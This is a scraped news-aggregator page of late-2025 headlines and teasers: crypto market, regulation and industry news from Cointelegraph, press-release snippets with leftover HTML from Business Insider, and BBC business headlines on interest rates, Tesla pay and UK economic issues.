With The Terminator’s Sarah Connor as an inspiration, SingularityNet’s Janet Adams is fighting for a better world with AGI.

Growing up in southwest Ireland, surrounded by mother nature, medieval castles and cathedrals, SingularityNETs chief operating officer, Janet Adams, lived a charmed childhood. She was surrounded by strong women from all walks of life, but her biggest inspiration came from the cinema Sarah Connor in The Terminator.

Little did she know at the time that this would be a pivotal foreshadowing moment for her future career.

Sarah Connor was an incredible action hero who was never sexualized. It was never about her being pretty or falling in love, Adams says.

Read more

Article link

Date of publish: Wed, 01 Oct 2025 14:20:00 +0100

Quitting Trump’s top crypto job wasn’t easy: Bo Hines

Tether USA CEO Bo Hines sits down with Cointelegraph to discuss Strategic Bitcoin Reserve and Tether’s plans for the future.

Tether USA CEO Bo Hines says it wasnt an easy decision to step down as the head of US President Donald Trumps digital assets council.

It certainly was difficult, Hines tells Magazine during a sit-down interview at Korea Blockchain Week, but he felt like that was the right time. 

We had positioned the United States to be the crypto capital of the world. Thats what the president asked us to do, the 30-year-old explains.

Read more

Article link

Date of publish: Tue, 30 Sep 2025 14:30:00 +0100

ETH co-founder moves $6M of ETH, crypto index ETF expands: Hodler’s Digest, Sept. 21 – 27

Hashdex’s crypto index ETF expands to include XRP, SOL, and Stellar. Meanwhile, an ETH co-founder has been moving ETH: Hodler’s Digest

Ethereum co-founder Jeffrey Wilcke could be looking to sell some of his Ether holdings after sending around 1,500 ETH to crypto exchange Kraken on Thursday. 

Wilcke sent 1,500 Ether, worth around $6 million, to the crypto exchange, according to onchain analytics platform Lookonchain. It came as the price of Ether dropped from $4,000 to around $3,900.

Moving cryptocurrency to an exchange deposit address does not guarantee it is being sold. 

Read more

Article link

Date of publish: Sun, 28 Sep 2025 01:46:00 +0100

Here’s what happened in crypto today

Need to know what happened in crypto today? Here is the latest news on daily trends and events impacting Bitcoin price, blockchain, DeFi, NFTs, Web3 and crypto regulation.

Today in crypto, Google is integrating prediction market data from Kalshi and Polymarket into its search results. Coinbase pushes back on Treasury over the GENIUS Act amid lobbying pressure on stablecoin interest, and Robinhood reported a 300% surge in crypto revenue for the third quarter.

Google is incorporating prediction market data from Kalshi and Polymarket into its search results as part of its AI-powered upgrade, enabling users to view real-time probabilities for future market events directly within the platform.

According to a Thursday announcement, the prediction market data will be available in the next couple of weeks, letting users view market odds and track how forecasts have shifted over time by typing a question directly into Google’s search bar.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 22:25:28 +0000

XRP whales cap selling as wallet growth hits 8-month high

XRP saw record wallet growth and easing whale outflows, hinting at a potential market bottom despite the recent price weakness.

Key takeaways:

Over 21,000 new XRP wallets were created in 48 hours, the fastest growth in eight months.

Record decentralized exchange transactions coincided with XRP’s price weakness, hinting at non-organic activity.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 22:59:53 +0000

Web3 gaming, DeFi lead sector activity in October despite market decline: Report

Despite a dip in active wallets and DeFi losses, blockchain gaming and decentralized finance continued to drive most Web3 activity last month.

Blockchain gaming and decentralized finance (DeFi) remained the most active sectors in Web3 in October, despite a 3% decline in total daily active wallets to 16 million, according to a new report from DappRadar.

Web3 gaming accounted for 27.9% of all decentralized application (DApp) activity over the past month, its highest share of the year, while DeFi maintained solid engagement at 18.4%, despite market volatility and ongoing regulatory pressure.

The most widely used DApps include Raydium, Pump.fun, Jupiter Exchange, OKX Dex and PancakeSwap v2.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 22:04:16 +0000

JPMorgan says BTC looks cheap next to gold, points to $170K fair value

Analysts at financial services giant JPMorgan forecast “significant upside” for Bitcoin over the next months in a report on Wednesday.

Bitcoin is trading below its fair value relative to gold when adjusted for volatility, according to analysts at JPMorgan.

The rise in gold volatility during its rally to all-time highs in October makes the precious metal riskier and Bitcoin (BTC) “more attractive to investors,” analysts said, based on the bitcoin-to-gold volatility ratio falling to 1.8, meaning BTC carries 1.8 times the risk of gold. The report read:

This mechanical exercise thus implies significant upside for Bitcoin over the next 6-12 months,” JPMorgan said. 

Read more

Article link

Date of publish: Thu, 06 Nov 2025 21:44:57 +0000

Crypto bills are ‘like oil for the onchain economy,’ Coinbase exec says

Coinbase's Shan Aggarwal and Scott Meadows spoke to Cointelegraph at the Blockchain Futurist Conference on the future of the industry in the US.

Coinbase executives are urging US lawmakers to view stablecoin and market structure bills as interconnected pieces of a broader crypto regulatory framework, as Congress continues to deliberate over industry rules.

Speaking to Cointelegraph at the Blockchain Futurist Conference on Thursday, Coinbase Chief Business Officer Shan Aggarwal weighed in on how a market structure bill could affect US markets.

According to Aggarwal, both the market structure currently being considered in the US Senate — called CLARITY when it passed the House of Representatives — and the GENIUS stablecoin bill passed in July act “effectively like oil for the onchain economy.”

Read more

Article link

Date of publish: Thu, 06 Nov 2025 21:28:15 +0000

Cathie Wood drops BTC forecast by $300K, says stablecoins eroding market share

Stablecoins have emerged as a store-of-value asset in emerging market economies at a rate no one predicted, Wood said on Thursday.

ARK Invest’s Cathie Wood has cut her long-term Bitcoin price projection by $300,000, warning that stablecoins are eroding Bitcoin’s role as a store of value in emerging markets.

“Stablecoins are usurping part of the role that we thought Bitcoin would play,” Wood, who previously forecast a top BTC price of $1.5 million by 2030, told CNBC on Thursday.

Stablecoins are scaling here, I think, much faster than anyone would have expected,” she said.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 21:02:55 +0000

Google Finance adds prediction markets data in new AI-powered update

The update brings real-time forecasting data from Kalshi and Polymarket to Google Finance, as more major platforms move into the growing prediction markets space.

Google is incorporating prediction market data from Kalshi and Polymarket into its search results as part of its AI-powered upgrade, enabling users to view real-time probabilities for future market events directly within the platform.

According to a Thursday announcement, the prediction market data will be available in the next couple of weeks, letting users view market odds and track how forecasts have shifted over time by typing a question directly into Google’s search bar.

The feature is part of an AI-powered revamp of Google Finance — a free web service by Google that provides real-time financial market data. The upgrade also introduces Deep Search, driven by its Gemini models, along with new live earnings features.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 20:03:08 +0000

Circle weighs in on GENIUS Act implementation: ‘Simple, strong rules’

The US Treasury Department accepted comments related to the implementation of the stablecoin bill until Tuesday as part of the law’s planned rollout.

Stablecoin issuer Circle has advocated for a level playing field among banks, nonbanks and stablecoin issuers as the US Treasury Department considers implementing the GENIUS Act following its signing into law in July. 

In comments submitted on Tuesday as part of the Treasury’s notice of proposed rulemaking for GENIUS, Circle was one of many crypto companies that weighed in on how the US government should implement the law establishing a framework for payment stablecoins.

While the company reiterated many of the principles for which proponents of the bill had advocated, such as having stablecoins “fully backed with cash and high quality liquid assets,” it also urged the government to set clear requirements for enforcement and consequences for noncompliance.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 18:41:57 +0000

Bitcoin bulls retreat as spot BTC ETF outflows deepen and macro fears grow

Bitcoin’s slide toward $100,000 accelerates as ETF outflows, weak earnings and macro uncertainty rattle traders, leaving bulls hesitant to reenter the market.

Key takeaways:

Bitcoin ETF outflows of $2 billion since Oct. 29 intensified market pressure and erased optimism around institutional demand.

Weak corporate earnings and macro risks suggest Bitcoin could fall below $100,000 before buyers regain confidence.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 18:40:18 +0000

Ray Dalio warns Fed is stimulating the economy into a bubble

Current fiscal and monetary policies will cause hard asset prices to rise, but both are signs of late-stage economic decay, Dalio said.

The US Federal Reserve’s decision to ease monetary policy is inflating an economic bubble that could drive up the prices of hard assets, but also marks the final phase of a 75-year economic cycle, according to former hedge fund manager Ray Dalio.

Typically, the Federal Reserve eases interest rates when economic activity is stagnating or declining, asset prices are falling, unemployment is high and credit dries up, as seen during the Great Depression of the 1930s or the 2008 financial crisis, Dalio wrote in an article posted to X on Wednesday.

However, the Fed is now easing monetary policy at a time of low unemployment, economic growth and rising asset markets, Dalio wrote, which is typical of late-stage economies saddled with too much debt. 

Read more

Article link

Date of publish: Thu, 06 Nov 2025 17:59:38 +0000

Jurors ask pointed questions in MEV bot trial as deliberations proceed

As deliberations entered their second day in a criminal trial over a $25 million exploit, jurors asked for clarification on previous testimony and the definition of “good faith.”

The jury deciding the fate of two men accused of money laundering and fraud related to a $25 million exploit of the Ethereum blockchain has submitted a series of detailed questions to the judge as they deliberate, indicating a close scrutiny of key points in the case.

On Wednesday, jurors in the criminal trial of Anton and James Peraire-Bueno began deliberating over a verdict after three weeks of hearing differing theories of the case from defense attorneys and US prosecutors.

The brothers stand accused of using maximal extractable value (MEV) bots to extract about $25 million in digital assets from the Ethereum blockchain in 2023, in what prosecutors describe as a fraudulent scheme.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 17:23:56 +0000

$100B in old Bitcoin moved, raising ‘OG’ versus ‘trader’ debate

Over $100 billion in old Bitcoin has moved as spot ETFs see record outflows, igniting debate over whether true OGs or traders are driving the market sell-off.

Key takeaways:

Over $104 billion in long-held Bitcoin has moved since 2024, sparking debate on whether older BTC investors are exiting the market for good.

Onchain data shows most moved Bitcoin was from short-term holders, not older addresses.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 17:15:58 +0000

The truth behind Zcash comeback in 2025

Privacy-focused protocol Zcash has received newfound support from industry experts and influencers, sending its native token price to multiyear highs this year.

Privacy is in vogue, and there has been an outsized winner in the market. The Zcash protocol has been the talk of crypto twitter and the price of its native token, Zcash (ZEC), has reflected that narrative.

Zcash's token has been trading above $500 for the first time since 2018, driven by an intriguing trend of support from some of the industry’s most popular commentators. 

The likes of Arthur Hayes, Naval Ravikant, Mert Mumtaz, Ansem, Threadguy and other notable accounts have been advocating for the privacy-first benefits of Zcash for months. Lofty price predictions interlaced with privacy-praising takes have played their part in ZEC’s outsized returns in comparison to the wider altcoin landscape.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 16:14:46 +0000

Bitcoin ‘$68K too low’ versus gold says JPMorgan as BTC, stocks dip again

JPMorgan said that the latest BTC price drawdown meant that Bitcoin was now undervalued compared to gold, in contrast to the end of 2024.

Key points:

Bitcoin joins US stocks in erasing its latest gains as market nerves heighten over US economic cues.

Fed interest rate cut odds slowly increase, but analysis says that risk assets could get a nasty surprise.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 16:08:13 +0000

How perp DEXs quietly took over 26% of the futures market

Perpetual DEXs are reshaping decentralized trading with faster execution, deeper liquidity and crosschain integration.

In 2025, perpetual decentralized exchanges (DEXs) entered a phase of rapid growth, marked by expansion in trading volume and other key metrics. The rise of hybrid central limit order book (CLOB) models greatly improved performance and user experience, narrowing the gap with centralized exchanges (CEXs).

In this report, HTX Research examines the landscape of perpetual DEXs, their evolution, current trends and the new exchanges emerging as key players.

Decentralized perpetual futures exchanges emerged in 2019 and have since undergone significant growth and evolution. They have proven to be one of the most successful and practical use cases for DeFi.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 15:00:00 +0000

Bitcoin’s valuation metric hints at a ‘possible bottom’ forming: Analysis

Bitcoin’s MVRV ratio indicated that BTC was forming a potential local bottom, suggesting that the price can recover due to seller exhaustion.

Key takeaways:

Bitcoin's MVRV ratio dropping to the 1.8-2.0 range signals a local bottom, historically preceding price rallies.

Distress-driven selling may clear leverage, setting the stage for a market reversal, according to analysis. 

Read more

Article link

Date of publish: Thu, 06 Nov 2025 14:59:54 +0000

Bitcoin is finding grassroots strongholds across the US

Across the United States, Bitcoin is gaining traction far from coastal tech hubs, driven by cultural alignment, local educators and emerging state-level legislation.

One of the unsung realities of Bitcoin (BTC) adoption in the United States is that the most meaningful momentum isn’t always happening in major financial centers. While regulatory battles unfold in Washington and institutions accumulate on Wall Street, everyday Bitcoin use is quietly taking root in places few would expect, including the heart of Oklahoma.

The latest episode of The Clear Crypto Podcast explores how Bitcoin has become part of daily life in middle America, while speaking with Matthew Moore, a broadcaster and educator who has emerged as one of Oklahoma’s most influential grassroots Bitcoin advocates.

Moore explains that Bitcoin adoption in Oklahoma looks different from the stereotype of crypto as a coastal or tech-centric phenomenon. Small businesses in towns across the state accept Bitcoin for goods, and Bitcoin meetups are flourishing. He and co-host Nathan Jeffay even bought beers with Bitcoin during a recent visit, a rare occurrence in most parts of the world.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 14:48:31 +0000

Bitcoin.com, Concordium partner on age-verified crypto payments

Bitcoin.com and Concordium have teamed up to introduce age-verified stablecoin payments to 75 million wallets, blending privacy with new compliance standards.

Crypto media and wallet platform Bitcoin.com has partnered with Concordium, a privacy-focused layer-1 blockchain, to enable age-verified stablecoin payments across more than 75 million wallets on Bitcoin.com’s network.

Announced on Thursday, the integration allows wallet users to verify specific identity attributes, such as age or jurisdiction, without revealing personal details. Verification occurs off-chain through independent third-party providers, and no personal data is stored on the blockchain.

Each transaction utilizes zero-knowledge proof technology to verify compliance requirements while maintaining user privacy.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 14:00:00 +0000

RedStone unveils DeFi risk ratings weeks after $20B crypto market wipeout

RedStone expands beyond price oracles with Credora, integrating risk analytics across DeFi protocols Morpho and Spark.

Modular oracle network RedStone launched Credora, a decentralized finance (DeFi)-native risk ratings platform aiming to bring transparency and credit analytics to lending protocols. 

RedStone said on Thursday that it had expanded beyond price feeds into the broader domain of credit, collateral and risk intelligence through its Credora acquisition in September. 

At launch, Credora by RedStone integrates with DeFi lending markets Morpho and Sparks to offer dynamic risk scores and default-probability analytics, accessible through an API. 

Read more

Article link

Date of publish: Thu, 06 Nov 2025 14:00:00 +0000

TRUMP memecoin price may increase 70% by end of 2025

The TRUMP memecoin has confirmed a falling wedge breakout, with price charts indicating a potential 70% rally toward $13 by the end of the year.

Key takeaways:

TRUMP confirms a falling wedge breakout, targeting a 70% rally toward $13 by 2026.

Issuer’s Republic.com deal talks and $200 million buyback plan strengthen bullish fundamentals.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 13:44:42 +0000

UN agency to launch blockchain education, advisory programs for governments

The United Nations is preparing to launch a blockchain academy for governments and a UN-led blockchain advisory group to assist countries in adopting the technology.

The United Nations Development Programme (UNDP) plans to launch two initiatives aimed at helping countries adopt blockchain technology.

Robert Pasicko, the leader of UNDP’s financial technology team, AltFinLab, told Cointelegraph at the UN City offices in Copenhagen, Denmark, that the organization plans to launch a blockchain education program for government officials alongside a blockchain advisory body.

The initiative builds on the UNDP’s existing blockchain academy for UN staff, now aimed at helping governments implement blockchain in real-world applications.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 13:39:02 +0000

Crypto’s growth engine stalls as Wintermute warns of ‘recycled liquidity’

Wintermute said inflows across stablecoins, ETFs and digital asset treasuries have plateaued, leaving crypto liquidity recycling internally.

Crypto market-maker Wintermute said the digital asset market’s current cycle is being driven by “recycled liquidity,” as inflows from its three primary funding sources have slowed.

In a Wednesday blog post, Wintermute argued that liquidity remains the defining force behind every crypto cycle. The market maker said that while blockchain continues to be adopted, the flow of fresh capital has decelerated in recent months. 

The company pointed to stablecoins, exchange-traded funds (ETFs) and digital asset treasuries (DATs) as the three major conduits for crypto liquidity, warning that liquidity inflow in all three has reached a plateau. 

Read more

Article link

Date of publish: Thu, 06 Nov 2025 12:43:14 +0000

Regulators must protect the architecture of freedom

The EU’s near-approval of Chat Control reveals regulatory threats to encryption. Web3 risks centralizing surveillance unless privacy becomes foundational.

Opinion by: Agata Ferreira, assistant professor at the Warsaw University of Technology

Recently, Europe came alarmingly close to approving mass surveillance of private communication through the proposed Chat Control regulation. The proposal faced intense backlash from the community, as it would have obliged providers to scan all private messages.

It was rejected only after Germany refused to support it. Just nine EU member states opposed the proposal, while 12 backed it and six remained undecided.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 12:30:00 +0000

Someone drained your exchange account? Here’s your emergency playbook

When your crypto is stolen, a rapid and organized response is crucial to trace the funds and rebuild your digital security.

Hackers can drain your crypto exchange account by gaining unauthorized access to your password or login credentials. This often happens through phishing links or malware that secretly steals your login credentials.

Attackers may also exploit weak passwords, reused credentials from data breaches or SIM swaps to bypass two-factor authentication (2FA). Once they gain access, they transfer funds to anonymous wallets, often routing them through mixers or decentralized exchanges to hide their tracks.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 12:30:00 +0000

Coinbase settles $24.7M fine in Ireland over transaction monitoring failures

Coinbase said it had enhanced oversight and compliance testing after coding errors led to gaps in transaction monitoring between 2021 and 2022.

Coinbase Europe Limited, the European affiliate of US crypto exchange Coinbase, has reached a 21.5 million euro ($24.7 million) settlement with the Central Bank of Ireland following technical failures in its transaction monitoring system between 2021 and 2022.

In a Thursday blog post, Coinbase said the coding errors caused the exchange’s internal compliance software to only partially screen some transactions for suspicious activity. The company said it detected the issue through internal testing, fixed it within weeks, and later reviewed all affected transactions.

Coinbase Europe ultimately filed around 2,700 suspicious transaction reports on transactions totaling about $15 million, out of the 185,000 transactions flagged during the review period. The company said that these filings did not confirm illicit activity, but were made as required under Irish Anti-Money Laundering (AML) laws.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 12:28:51 +0000

Banks lobby US Treasury for blanket stablecoin yield ban, Coinbase pushes back

Coinbase insists that the US Treasury cannot override Congress’s intent on the GENIUS Act, but banks continue to press for a blanket ban on stablecoin interest.

The US Department of the Treasury is facing conflicting feedback from crypto companies and traditional banking groups over how to implement the GENIUS Act, the law that regulates stablecoin payments in the US.

In a letter on Tuesday, Coinbase urged the Treasury to limit a ban on stablecoin interest payments exclusively to stablecoin issuers, while allowing it for non-issuers, such as crypto exchanges. Coinbase said its proposal aligns with Congress’s intent when passing the legislation.

At the same time, several banking groups, led by the Bank Policy Institute (BPI), have pressed the Treasury to extend the prohibition to non-issuers, advocating for a blanket ban on stablecoin interest payments.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 11:33:30 +0000

Privacy coins surge 80%: Why Zcash and Dash are back in the spotlight

Privacy coins surge 80% as Zcash and Dash hit multi-year highs, driven by rotation, halving hype and renewed demand for transaction privacy.

Privacy-focused cryptocurrencies have rallied sharply, with sector value up nearly 80% by November 2025.

Zcash hit a seven-year high and Dash a three-year peak as traders rotated into privacy assets.

Technical breakouts, derivatives positioning and an upcoming Zcash halving fueled the move.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 11:30:00 +0000

Spanish research institute to sell $10M Bitcoin stash bought for $10K in 2012

Researchers bought 97 BTC in 2012 for a blockchain study. Thirteen years later, they’re selling the stash to fund quantum research projects.

A Spanish public research institute is preparing to sell a long-forgotten Bitcoin stash, worth over $10 million, which was purchased for just $10,000 in 2012 as part of a blockchain research project.

The Institute of Technology and Renewable Energies (ITER), overseen by the Tenerife Island Council, acquired 97 Bitcoin (BTC) more than a decade ago to study blockchain technology. The council is now finalizing plans to divest the holdings, according to a report from Spanish-language newspaper El Día.

Juan José Martínez, Tenerife’s innovation councillor, told the outlet that the council is working with a Spanish financial institution authorized by the Bank of Spain and the National Securities Market Commission (CNMV) to facilitate the sale.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 11:09:27 +0000

Kalshi, Polymarket traders bet Supreme Court will curb Trump’s tariff powers

Prediction markets show waning confidence in Trump’s tariff authority, with both Kalshi and Polymarket traders bracing for limits on executive power.

Prediction markets are signaling declining confidence that the US Supreme Court will rule in favor of President Donald Trump’s sweeping tariff powers, with traders on regulated and crypto-native platforms reducing their exposure following the week’s developments. 

US-regulated event-market platform Kalshi showed Thursday that traders now assign a 29% chance that the Supreme Court will side with Trump, a 28-point drop in a single day. 

On Polymarket, Kalshi’s onchain competitor, where contracts are settled in USDC (USDC), the odds fell to 25%, reflecting a similar collapse in sentiment. 

Read more

Article link

Date of publish: Thu, 06 Nov 2025 10:30:51 +0000

How to spot bull and bear market traps in crypto before they catch you

Learn to spot fake breakouts in crypto using funding, OI and volume signals — and avoid bull and bear trap setups.

Use confirmation, not hope: Wait for a higher-timeframe close and a clean retest before sizing up.

Read leverage tells: Extreme funding plus rising open interest at a key level signals trap risk in the opposite direction.

Don’t trust thin books: Off-hours liquidity, spoof orders, listings or unlocks can manufacture fake breaks.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 10:11:47 +0000

News Ticker - markets.businessinsider.com

ENDVR Energy Launches with New Name, Branding, and Website to Power Ontario’s Sustainable Energy Future

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />MILTON, Ontario, Nov. 06, 2025 (GLOBE NEWSWIRE) -- ENDVR Energy, a subsidiary of Milton Hydro Holdings Inc., is proud to announce its official launch under its new name and branding, alongside the unveiling of its website at <a href="https://www.

Article link

Date of publish: Thu, 06 Nov 2025 15:08:11 GMT

I'm the CMO of fintech Chime. AI has helped us make ads 60% faster and rely less on agencies.

Article link

Date of publish: Thu, 06 Nov 2025 15:06:00 GMT

HelixIntel and USIP Partner to Strengthen Maintenance Operations for Small and Mid-Sized School Districts

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />Key Takeaways: <ul type="disc"><li style="margin-bottom:8pt;">Strategic Expansion: HelixIntel’s CMMS is available to small and mid-sized school districts in Washington through a partnership with USIP and Clear Risk Solutions.</li><li...

Article link

Date of publish: Thu, 06 Nov 2025 15:05:00 GMT

A Smarter Way to Move: StarRez and Storage Scholars Announce Partnership to Support Campus Housing Teams

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />GREENWOOD VILLAGE, Colo., Nov. 06, 2025 (GLOBE NEWSWIRE) -- <a href="https://www.globenewswire.com/Tracker?data=OEcaq9k22z4vjbhj_sYlMqBRRts_hwiehaphYz4GptN5bmQSzbEbKf5lMzvgtM6qpISgFAgsYsE5_hQsvKdEKw==" rel="nofollow"...

Article link

Date of publish: Thu, 06 Nov 2025 15:05:00 GMT

Four Farmers From Across the Nation Advance to Grower of the Year Finals

<i>Winner will be announced at 2025 Organic Grower Summit in December</i> <strong id="dateline">MONTEREY, CA / <a href='https://www.accessnewswire.com/' rel="noopener nofollow" target="_blank">ACCESS Newswire</a> / November 6, 2025 / The Organic Grower Summit (OGS) has unveiled the finalists for the <a rel="nofollow" href="https://pr.

Article link

Date of publish: Thu, 06 Nov 2025 15:05:00 GMT

This week, the price of XRP climbed to $2.27, and JEXAI launched its innovative XRP blockchain ecosystem, attracting widespread attention.

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="justify">Felbridge, West Sussex, England, Nov. 06, 2025 (GLOBE NEWSWIRE) -- Cryptocurrency company Ripple announced on Wednesday that it has completed a $500 million strategic investment round, valuing the company at $40 billion.

Article link

Date of publish: Thu, 06 Nov 2025 15:02:15 GMT

Northwest Pump Expands California Presence with Acquisition of Orange Coast Petroleum Equipment

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />PORTLAND, Ore., Nov. 06, 2025 (GLOBE NEWSWIRE) -- Northwest Pump Equipment Co. ("Northwest Pump") is pleased to announce the acquisition of Orange Coast Petroleum Equipment ("OCPE"), a full-service provider of fueling and energy infrastructure,...

Article link

Date of publish: Thu, 06 Nov 2025 15:00:00 GMT

Home Prices Increased in 77% of Metro Areas in Third Quarter of 2025

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />Washington, D.C., Nov. 06, 2025 (GLOBE NEWSWIRE) -- Home prices rose in 77% of metro markets (176 out of 230) during the third quarter of 2025, according to the National Association of REALTORS<sup>®</sup>’ <a href="https://www.globenewswire.

Article link

Date of publish: Thu, 06 Nov 2025 15:00:00 GMT

Integer Technologies Announces Strategic Investment from Razor’s Edge to Accelerate Growth

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="center"><img alt="Integer_Razors Edge photo" height="600" src="https://ml.globenewswire.com/Resource/Download/60cf66f4-2c24-4889-9e0f-753ee1c9408f/integer-razors-edge-photo.jpg" width="600" /><br /><p align="center">CEO Duke Hartman and...

Article link

Date of publish: Thu, 06 Nov 2025 15:00:00 GMT

ACT Expo Named Fastest-Growing Transportation Show in the U.S., Demonstrating Rising Industry Demand for Advanced Fleet Technologies

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />Santa Monica, California, Nov. 06, 2025 (GLOBE NEWSWIRE) -- <a...

Article link

Date of publish: Thu, 06 Nov 2025 15:00:00 GMT

BBC News

Elon Musk's $1tn pay deal approved by Tesla shareholders

The richest man in the world will get hundreds of millions of new shares if he hits his targets.

Article link

Date of publish: Thu, 06 Nov 2025 23:25:25 GMT

Bank says inflation has 'peaked' as it holds interest rates

Rates are left unchanged after a tight vote ahead of the Budget later this month.

Article link

Date of publish: Thu, 06 Nov 2025 17:35:34 GMT

Will Bank of England governor play Santa or Scrooge on interest rates?

The interest rate decision was made by the narrowest of margins, meaning all eyes are now on the Bank's December meeting.

Article link

Date of publish: Thu, 06 Nov 2025 15:16:35 GMT

Eastern Airways goes into administration

The UK regional airline had a contract with Dutch airline KLM but this has been terminated.

Article link

Date of publish: Thu, 06 Nov 2025 21:18:48 GMT

Trump unveils deals to lower US weight-loss drug prices

US President Donald Trump announces agreements with drug makers Eli Lilly and Novo Nordisk.

Article link

Date of publish: Thu, 06 Nov 2025 18:25:36 GMT

Will quantum be bigger than AI?

The highly complex technology is increasingly being tipped to transform computing.

Article link

Date of publish: Thu, 06 Nov 2025 00:10:59 GMT

Boeing criminal case linked to deadly 737 crashes dropped

The judge said he did not believe the decision was in the public interest but he did not have authority to deny the request.

Article link

Date of publish: Thu, 06 Nov 2025 17:34:13 GMT

Grand Theft Auto studio accused of 'union busting' after sacking workers

A union representing people in the gaming sector said 31 people were fired at Rockstar's UK studios.

Article link

Date of publish: Thu, 06 Nov 2025 16:31:14 GMT

EV drivers could face new tax in Budget

The BBC understands there have been "conversations" within government about the possibility of a new levy on EVs.

Article link

Date of publish: Thu, 06 Nov 2025 15:42:19 GMT

Planned steel investment grants will no longer go ahead

The government scraps plans for innovation fund saying it wants to prioritise support for primary steel makers.

Article link

Date of publish: Thu, 06 Nov 2025 12:27:25 GMT

Conservative justices sharply question Trump tariffs in high-stakes hearing

If the court rules against Trump's tariffs, it could force the US to refund some of the billions it has collected.

Article link

Date of publish: Thu, 06 Nov 2025 02:39:08 GMT

Mone-linked firm PPE Medpro owes £39m in taxes

Administrator's report shows firm owes £39m to HMRC on top of £148m owed to Department of Health

Article link

Date of publish: Wed, 05 Nov 2025 19:21:44 GMT

King handed Nvidia boss a letter warning of AI dangers

In the 2023 remarks from the King he said AI was "no less important than the discovery of electricity" but warned the risks must be tackled.

Article link

Date of publish: Wed, 05 Nov 2025 23:40:47 GMT

Busiest US airports face flight reductions because of government shutdown

Flight capacity will be cut at major airports as air traffic controllers report issues with fatigue amid staff shortages.

Article link

Date of publish: Thu, 06 Nov 2025 18:20:31 GMT

UK facing sickness bill 'crisis' - what needs to change to get more people working?

Plans to get more people working pose some challenges for employers, employees and health services.

Article link

Date of publish: Wed, 05 Nov 2025 17:16:56 GMT

MP wants Elon Musk's chatbot shut down over claim he enabled grooming gangs

SNP MP Pete Wishart says he is seeking legal advice over the "disturbing" AI-generated social media post.

Article link

Date of publish: Wed, 05 Nov 2025 17:14:53 GMT

France moves to suspend Shein website as it opens first store in Paris

The economy ministry said proceedings would last until Shein proved all of its content complied with French law.

Article link

Date of publish: Wed, 05 Nov 2025 16:55:23 GMT

MSPs pass land reform which could force break up of huge estates

The legislation is designed to help reduce the concentration of rural land ownership among a small number of people.

Article link

Date of publish: Wed, 05 Nov 2025 19:15:34 GMT

LED mask ads banned over acne and rosacea claims

Adverts for cosmetic devices not registered with the medicines regulator must not make medical claims.

Article link

Date of publish: Wed, 05 Nov 2025 16:56:09 GMT

Trader who inspired The Big Short bets against AI as tech shares fall

Shares of major tech companies have fallen in the US and Japan over fears about AI bubble

Article link

Date of publish: Wed, 05 Nov 2025 10:21:33 GMT

Oldest victim of Post Office scandal, 92, receives final payout

"I can settle up my affairs. I can turn the heating up full blast, and that will be wonderful," 92-year-old Betty Brown told the BBC.

Article link

Date of publish: Wed, 05 Nov 2025 00:05:04 GMT

M&S profits almost wiped out after cyber hack hit sales

Marks & Spencer's online and in-store sales were hit by a cyber attack which it said cost it £101m

Article link

Date of publish: Wed, 05 Nov 2025 12:39:10 GMT

Britain sliding 'into economic crisis' over £85bn sickness bill, ex-John Lewis boss warns

The number of people who are out of work for health reasons has grown by 800,000 since 2019.

Article link

Date of publish: Wed, 05 Nov 2025 13:04:38 GMT

Tesla says Musk should be paid $1tn - will shareholders agree?

The car-maker is lobbying fiercely for the pay package, which is being voted on ahead of its AGM on Thursday.

Article link

Date of publish: Wed, 05 Nov 2025 00:46:50 GMT

Criminal network behind UK mini-marts enables migrants to work illegally - BBC investigation

Undercover reporters were told how easy it was to make big profits selling illegal vapes and cigarettes.

Article link

Date of publish: Wed, 05 Nov 2025 06:00:51 GMT

Head of UK's richest family dies aged 85

Gopichand Hinduja helped transform his father's modest textile and trading businesses into a global conglomerate.

Article link

Date of publish: Tue, 04 Nov 2025 18:32:54 GMT

Reeves' pre-Budget speech fails to rule out tax rises

The chancellor says she will make 'necessary choices' in an unusual pre-Budget speech.

Article link

Date of publish: Wed, 05 Nov 2025 00:28:34 GMT

The start-up creating science kits for young Africans

Stemaide's goal is to bring tech skills to young Africans and prepare them for future jobs.

Article link

Date of publish: Tue, 04 Nov 2025 00:13:20 GMT

'This is the big one' - tech firms bet on electrifying rail

Railway operators have new options for electric trains including getting rid of locomotives altogether.

Article link

Date of publish: Fri, 31 Oct 2025 00:14:09 GMT

Businesses are running out of pennies in the US

Find a penny, pick it up, then what? Now the US has stopped making pennies, a shortage has emerged and created confusion.

Article link

Date of publish: Fri, 31 Oct 2025 21:54:31 GMT

The US bet big with Argentina bailout - is it paying off?

US Treasury Secretary Scott Bessent has called the Argentine peso "undervalued". But not many people agree.

Article link

Date of publish: Fri, 31 Oct 2025 00:11:41 GMT

